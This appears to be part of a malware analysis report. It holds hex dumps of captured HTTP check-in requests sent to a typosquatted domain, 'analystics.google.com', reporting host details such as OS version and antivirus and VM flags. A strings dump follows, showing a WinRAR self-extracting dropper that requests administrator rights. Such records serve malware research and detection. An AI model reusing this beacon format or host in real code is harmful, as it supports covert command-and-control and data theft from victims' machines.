0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5370 2f693336 336a4336 70762048   z+Sp/i363jC6pv H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b536c 33757661 55784f2b 425a2048   z+Sl3uvaUxO+BZ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....


Strings
strcatVirtualProtect
..7M
.
.
.
.}
.
.
\
.CC
 

 1993-%d
Accept
a?(J
Bro&wse...
by Alexander Roshal
bytes
Cancel
&Cancel
Cannot create folder %s
Cannot create %s
Cannot open %s
Close
Confirm file replace
Copyright 
CRC failed in %s
DCRC failed in the encrypted file %s. Corrupt file or wrong password.
Decline
&Destination folder
eRichEdit
ErroraErrors encountered while performing the operation
Extract
Extracting files to %s folder$Extracting files to temporary folder
Extracting from %s
Extracting %s
Extraction progress
File close error
folder is not accessiblelSome files could not be created.
                                 H
         (((((                  H
         h((((                  H
~hRichEdit20W
Install
	jmsctls_progress32
kernel32.dll
KERNEL32.DLL
License
LICENSEDLG	RENAMEDLG
Look at the information window for more details
modified on
mscoree.dll
MS Shell Dlg 2
Next volume
Not enough memory
No to A&ll
Packed data CRC failed in %s
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please download a fresh copy and retry the installation
Read error
Rename
&Rename
Rename file
REPLACEFILEDLG
Select destination folder
Skipping %s
STARTDLG
The archive comment is corrupt
The archive header is corrupt
The file "%s" header is corrupt%The archive comment header is corrupt
The following file already exists
The required volume is absent2The archive is either in unknown format or damaged
	TITLE_BMP
TITLE_BMP
=Total path and file name length must not exceed %d characters
Unexpected end of archive
Unknown method in %s
WinRAR self-extracting archive
with this one?
Would you like to replace the existing file
Wrong password for %s&Write error. Probably the disk is full
&Yes
Yes to &All
^@@@@@
                          
+----(
+@-@+*
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
))020302130312131303131I13613373373373I67I37I6ILI7I7LIHLLIHLLLQLRLQRLRRRRQLLLIL5LLLLLLLLLRRLR>RLVRTRTRTTVTWWWWWWWWWaWWTWW`TWW`TW``WhTT`TW```T``Wh`h`hbhhc`h`h`h`hchhchhjhjhjhhjhkhkhkkhkkkhkkhkkhkkhkkikkhkhkkhkhkhhkhhjhjhhjhhhhch`hjhhhb`hhhahhahTW`ahWhbWha0
0A@@Ju
0!CQW(c}o
0I7><u
0MMQMSMM6"
0MXSYVM2(
0^plp_pp^L
0Sd$QD
0SSSSS
0W@'P7`
0Y^]^SM1(
.1.117O[ry~tmR.
|11I5H
1~k&Ml5	
1SZZSN1
1U[\U7,
1Z[]d[ZU7
@@+2C@BAC-CBDDA2A-A-@)
^-----+-2-D--D-BD6BDFHDD6DEA-(
2EKMGGMG2)
"2G`#@V5
2jphct
]2m"=R
;2N:~~
2p'b1Y
2sZUSUZSNH.
2tSSUSSNH,
2yZYUYSZUNH1"
3~[\a\fZZd[aZZZZUO7L767717777HOU[dfWZO7777777O7OUagngeaaOOOO>OOOOTU`antvzuvu
3a/t0I
3MJ6D2B--,
3MJJKMJ62
,.3M[]]][Z]d]]d[\][[]d]deeeeeWO5/1LWgtttvvv
3[^^^^p^X3
3V'iq--"
;#3*^VT
3XSXQG1
""("")",".".".#........4.040.4015414154555555<57>5>7>7>7>L>7>L>L>R>L>R>LTR>LTR>R>R>R>R>R>R>R>R>LT>L>L>>L>L>L>L>5>7>7>5<57<555555514541414040.55LLW
;=4'&4w
46SSSRM6(
$ '4999
4!/b8`
4`GkwRgK
%4hkjkk
%%%'4>iowkW5
4(MPPKMJ62(
;4NI1,,
?4Odntv
4q`;>vG~7w>
_4qvR6Iev
5\(\|[
5{0nUR
5	i?5p/
^{5}LX9y
5wwwWR5405TWiw
5xnM^yN>g
,-6-6D6-D6-6EHMMYZZ]d]]eeeempnmrprrrmrsrtttzvttvumnegef[degervvu
	*6DD6EIHKMQH1
6GKMXJF*
6JGMPMJSMSPF0
6ool@d[M*AHS;I
!6qUCU#
6SMQM0
6SSSJ1("=
6SSSQH1
6SSSSUQRNLU[d]Z\ZSZ\erry
6SY[SZR1
6S[ZYVQH1/
6U&ewu
_<6(?X/H
	6XZSQN6
6yi%M6
6^[^ZZ]UH"
@*}77~
	7d[da]dWN/
7N8IM.)(h
7rrlU1
8$0feemgmggpmrrrrmnrrrtogeaaUWfnwzv
8##.5>aw
[8|\|6\{!]'H
'8''99=?
'8%'999?
8e(.8>
8&m^j9l
^8ni~r
_8O(^M
_8O(:>ouSx
_8O(?X/
^8O(?X/H
_8O(?X/H
_8O(?X-I
_8O(?XoH
_8O(?X/)v	v)
_8O(?X/X
+8 ZS;J+~xn
9"7U[U7.
 '99;;9:;;4R>>
9$#dttyrma7
9ICf5%
'9l}]	XE%
>		9O$=
9,@r&BaS
9"Ulpme[7"
;9''$!!&#W
))a-	=
^!^A^!^
((,-,A-26-E6HHNNSU[]didiememmrmrmrmmgmeigmemmrrrsvtv{u
a6loAZx
@@@A--@+@-A@-@+
^@AAA@2@A+-@--++@-@+-AADDC-(
AaYEf!
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
^ACAC-D++-+++++++--BAGGEDA-*
+AD--(
^+---A-DADDDADDAGDBDCDGB6DD-)
AD^M/V
a	eyuXZ
#agdaU"
AGGGKGGGGGGF(
An application has made an attempt to load the C runtime library incorrectly.
  </application>
  <application>
</asmv3:application>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
  </asmv3:windowsSettings>
  <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
</assembly>
<assemblyIdentity
    <assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
'avtvzvzvttn[`1
b6U$gb0K
B:8mr)n'
B#b#bC
(-BD6MMMYZ]Zede]dpedeeerrprrgmdgsrtrzv{~
(+BDD-+
*++----BDEIJMMMSQN3,
)---+++B-E6-,
BeginPaint
_	bM\x_:
B	P/Hwh
b"T_8u2
By5	8+
Byny%_#
c8>*v,
/]~CAD-,Pg
cc?<4#!
c^&CX1
+CDGCEGGCGA(
cIVFFPU
<cjjc`4## 
ClwU!g
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
CorExitProcess
)CPCKGCPCG-
CreateWindowExA
- CRT not initialized
Cv12+A
Cx>A8m(~X.~
^D+@++
^D2D2EGHKMGMMKGJMGPKMGMGQMMME-
d,$5EE
**D6MHQMSOH6H6NMMMNMSSS\\deee]eeemee[ZZZSZSSZZd]gptttzrvvt{zz
@.data
DBCDA+
^-D-D--+A+A-DAADABDA2AAD2GDD
dddd, MMMM dd, yyyy
)DDHMHMEH-
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
</dependency>
<dependency>
  </dependentAssembly>
  <dependentAssembly>
<description>WinRAR SFX module</description>
DFKEGGEEGEF-
-DGGED2A)
DGGGEGDD)
DGMGHMGMKM36(
DGPKPPKJD
dHtEi_
DispatchMessageA
DJJPKPGKMPJA(
DJMKJMJM6(
D	>@K>
DOMAIN error
dP8b:y
    <dpiAware>true</dpiAware>
dsyty~yrQ"
{dwGa/Q
!E4U:W
,~;EbF
ECar19dl
ec>":	+E
%Ec&T#V
Ef` &|`
e[H."n
EkA2xT
EncodePointer
EnterCriticalSection
essxyyseQ"
e u^|%.EZ
eu z0{e*p
eV5F-v
eV5N%v
EX,9|o
ExitProcess
&E]ZH.`
F*"]*;*
F:a9ZZEw `
][f[da[edWd[ef[aeeaefaeeggeggegigggnggennogrnrnnorrnurutu
Fe66&|
February
-FKFEGHJPKMM-
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
 FPx_h?
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
Fs`Kf&
fTV8Fj
;$fvk`T>bik
 G0I@'P7G
G1 !gkw
g2sKy[Yky{
G3$!Xbws
G@CCCCCGB+
GCKCKKPGC0
(GCKGKGKDGD-(
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
Gffff`
GfvoczI*48jY'r
GfWvgF/
GFWWQS
?ggcib`5#
	)GKCPKGD(
Glxxsxsxspxspsxysyxytyzyyyyytytyyysyyyyyrsrpppp]]^\Y^Z^]^d]pppprprxrssyy{~{~
Go:C1}
(GPKPPJA(
GPw"g2
*GRw`gg
G\wn!A
G<x-< "
GXPXPK3(
Gy N'_
H3xk[;{g
;	h`5#8
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
_HGDGDKEFEEGJJGMGMKGMGEKGMKH2)
-HGGM6
HH:mm:ss
'[hI0.
hIkYRi^y>	8
hImY]i~y|	9
}>H.M^9KH{x}
h*mE&vOXK
HMSPMSM6(
HSRM60
hWh,uo
h[X.G>=E+]
HXMSXR1
h@yQ'g
HYSSNH)
HZ^ZQ1
\I7K!~Y5
iaeaefeaffedageigiegegigeigggingenggrrnnmnrnnounroouvuuuuuuzuv
iay(	l
iby\	L
!IEfue
*ig&ZL
iHy8+nU
IMQSSYUSSUM6
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
iOy(	>
I^^^]p^^[6
<i,q^_L
IsDebuggerPresent
Is`g i
IsValidCodePage
ity\	L
ixysyyymU
i^y2	-
i,y\e^
I*Y:ivnB
,I"Y>i,y
i,y\	L
IYYQ2,""06LNIOX[]pepmreeZN.
IzgxPkS
izyzyv~mO"
j1SSQMN1
j>/& 8
)J9]6YSB
+j9@&u{t
JanFebMarAprMayJunJulAugSepOctNovDec
January
jchOOUSMMM-
jCv5JZ]}Q
<:je]]\
J%e1p4
jIeYFiDy?	.
j.IH7,
-J=J1`
?jjjh=<#
j@j ^V
Jl^pp^ppZ7
]jm;?uiA]U
Jr9u+EP
JSXJD0
+J){x?E
\j;YE>
}j]z}JQ
.k2pOw=
k`/! 8
k?<9<;
K$9[:>
kb>><>><>```k
kernel32.dll
KERNEL32.dll
|\k"G#D
kh><<=`hk
[<K,;@:j
?,KJMSJMJH*
KKc4$!I
!KkxF-?XvH
kk.xKL
kNb^UnE~2
KPKPXK3)
KQMD32)(
 {|KSx
)KXXXXPM(
@,`,`l
l18H'(G
l2-D-(
L-~(-3`
L9t y)
      language="*"/>
lB9u{e4U
LCMapStringA
LCMapStringW
&lC!p4
L	\&cV
L/CX[r'
lD6-6-----*B--6B6DHHMEMHHD6--*
LeaveCriticalSection
LE[Q483|@
Lexepe]U0:
lG2D2(
LoadAcceleratorsA
LoadLibraryA
-l<-;pK<
	LpxlU.
l<t1v"g^
luIeyo
l]^X~`
,LyMMMR
lYVaNy
"m}}}}
+\m9w6
MessageBoxA
mgtjM'
MhAx-K
Microsoft Visual C++ Runtime Library
Mlpppqpm[3
MM/dd/yy
MNN^ynf~
Monday
MPSSMQH.
@MQ7`u
-MQSG6
)MQSNS1
M-sa4@%S5r,s
#MSML61(
MuIUn8
MultiByteToWideChar
!(MX=b
M]XJ:|
MXXSKI-
!M	<y;
MY[XZSM1"
N0Ie*u
N9^I.Y~?\'D
NA^ln{~
      name="Microsoft.Windows.Common-Controls"
  name="WinRAR SFX"
N[]d[]]\\aZRNUZ]dZL1"
Neevi.J
NeZa]d[U7"
~>NH]i-
nH?xN(
nIbYni
^<nl~\
]NM^lni
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
NQ^anI~
NQSSSNSSMSMMMMHEMSMSSZYd[dd[degpeemgeedZYUSOMMSMSZZZ[dZZYUSMQMUSS]grv
ntdll.dll
N[ZZR7"
NZZSU6,
O1v,W?
>o9`DC3
October
Od*B]Dy
"Odggrrnrgorrrotttutvuz
?&#Odgtuutuututzvuz
Odmgenmernmrnrrrorttrtvurvuvvzv
OedaeUO1,
Ofed]aUO4"
"Ofgiorrurrnvutu
ohaUQ!@
/oI,Rr
OM5*IA%
|Oq&8,(Z,_H
(+O|+Q*eV=`-
 oSQ@AUy:
O~stLg
owh# =
Owwwwp
|ox__7OZXU
p|5I%7
P:&*A=
pGGDGIMGMMKMJMJMKQMSJMKMSPSKMJ-
pj$}J.
Please contact the application's support team for more information.
<plw ;J
p|!M*Q
PNO'IX F
PoEd6S
	.|=P&P
PPPPPPPP
)PPXSXQ2(
      processorArchitecture="*"
  processorArchitecture="*"
Program: 
<program name unknown>
pssqcaSQE=
      publicKeyToken="6595b64144ccf1df"
- pure virtual function call
PW1H:u-|r
)PXPXPPC)
pxsxsxs]L
 PyWW^
)PYXXXS3
Q~(cfAd
qED2D(
qG_3a U
QIuYXi,y?	
qJ2H2(
 qj5H%]
Q	K]Y$~
qMDHD)
@qMHIH)
QNZ^Lnz~6
Q|,o;me*u
&)]qppxqx]I
QSH616INZZ[Z[Zd]YeZ]epre[O.
QSXSQN0
,QSY[X]]Z7.
QueryPerformanceCounter
]%-Q.]V;"H-U{
!	"Qw)l9`
Q	&x7U
QY3i=<\
Q-_Yhi-uM
Q=Zc=m;u*1	U
]R7TeD
r8c'XlP*
r9u*3=U|
`.rdata
RE14G4
Rectangle
RegisterClassExA
      <requestedExecutionLevel level="requireAdministrator"
    </requestedPrivileges>
    <requestedPrivileges>
rI~Y<iIy
\rL~|Nl
>rozvvzw
,[rpr[U7/"
[RP\Uj4
RtlUnwind
runtime error 
Runtime Error!
rVy5P?!8
Rw*VwrB
rYv/-P
ryz dF
RZ1" =
RZ^qf<
_`.|>}#\s4@&~
s7b'r!
SAC5Ee
Saturday
  </security>
  <security>
se@!Ec
S]e[H,#
Sepp[L"
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
|S+f#r+}/
sHMHMRSMMMQMJMKMJKJJMMQQSSSSMSJM6H66D6---(
;s+[HN
ShowWindow
SING error
S,#(	iT
sJNMNH(
SklU0s
sSMMM1
+sSQMQH0
"SSYYSYYZSYUML6I7HLH7HNSZ^Z][d]epemprmporrrsrsrsttteWVaenstrrmrgrpnrtt
SSZSS6,
strcat
Sunday
SunMonTueWedThuFriSat
SunSystemClass
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
(SXSPXQ6
s{ymO.
"SYXSXS6
S[]\]\[ZR6=
T6z-Ye
t`>7z%j5NE
TerminateProcess
    <!--The ID below indicates application support for Windows 7 -->
    <!--The ID below indicates application support for Windows Vista -->
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
T#'ibF
TI  qim
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
\+}^Tn]~x
ToEfU:e*u
TranslateAcceleratorA
TranslateMessage
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
t"SS9]
[tttvvtmWO"
{tt{vv
~{ttytt{~ym3
t$<"u	3
Tuesday
;t$,v-
tvrtrtvu
t+WWVPV
      type="win32"
  type="win32"/>
UDE|5l%
UdEm52%"
U]eeedpeeneepeermpgeeaR7
uEEl~|
#Uef[U7/,
)u=EnF~
'u GD\@0"A
      uiAccess="false"/>
uIvYniXy9	%
{u_j9%
Um>|08
Umrsyztsnorvzv~vzvzv{~
- unable to initialize heap
- unable to open console device
UNer|nL
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
uNootIq
{uogaO
UpdateWindow
UprpmpZO1,/5R[daZWemt{
	&UQ7_)
u|QmAP
UQPXY]Y[
urebUREB52%"
URPQQh@WB
USER32.dll
USER32.DLL
usrI!r
{utreddeegszvzw
uV5F%v
uxv51}
U]Y[]YS1"
UZ\ZZ\ZZUOL.9
 V0#AS
|&V2V9P/J
(%v:35
V3xrBk>7
V}&	6%
(v9f	Q
,v	c6s
vcO#8% 
vDf=V<Fr
V&d.n#
  version="1.0.0.0"
      version="6.0.0.0"
v$F7|0
VirtualAlloc
VirtualFree
V	M?7J-X
v	N+D$
V^N^J(?S/H&
<v,]qkiF
"v#qwe
VSYZQM.
Vt%p?\'/
	`VWF@
/W4U&h
w5W@'@6!
W6#	vGn
WBGRwbgr
WBGRw"g2
..}w	&CJ
Wednesday
w"g2w"g2
w"gFBB
w"grD,
w"gt:B
;w"gWHvX
WideCharToMultiByte
WiT54"
wkgF$0
WlGgwMgG
WqG{wGg
WR7_lz
WrGgwCgW
WriteFile
wSSSSMH.
W!T?g!u
wUGOI4
wuknkoo
wvnkgcaT74//"
wW;0i?ePM
WwGgwGg2
WwV_|/
Wz+b=^
(W`ZH?
+W^Zjn$
<#WZU7'
X@@@@@
x'1['{5j
x1@"VOs.
x}2oc^
]x{+_4
XF.[ge
X?h/8_
X>h<x^
X>h.y|	l
xijyGIpY
@?'%XIW
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
x:q-6q
Xr%|'L
:X)xST
~~~y~~
`y&3\<
Y7ec6d?7
YEJ*(Q
yGMQMMMGHEED-+*******-D-B6DGH6D.*,02HMMMMHFHDF6*(
yIiYYiI
Y?i)y[	E
yI~Y]i
y<i,y\	L
Y<i,y|	l
Y<i,y\	l
Y<i,y\	L
Y<i!y\	L
Y>i.y\	L
Y<i,yY	L
Y!J-fu0o
}}y{lF
YN[^(nd~
}|}{|y|qyxyxl+
>=Yt1j
YV3)O\|L
}}||y|y|~}}
{~yye3
}{~yyyssp3
}{}|{yyyysl2
~{~~yzyl3
 $]{~z~
@?)z)|
z0{UZ1Z
Z[d]ddZU1
'.Z]eeeedeeeeegmemdedZO1
Zi6z-H
>z^j^[
Z{,Ks-Ak
Zl#p1@
Zpeme[W1
ZP'Q5fz
#ZrmeZTH."
z{ttmr]Z[ZSZSZ[eemrgiaW<<144<>`c
Z=US~c
z&Y6)#
~{~zyyz{z}
ZZWZWdd[ZeZfaZdadaZfWdZf[adaeageefidififfiggeginrgnumnnnonuounvuut
#ZZ[ZH/
ZZZZWZZZZZZUN1.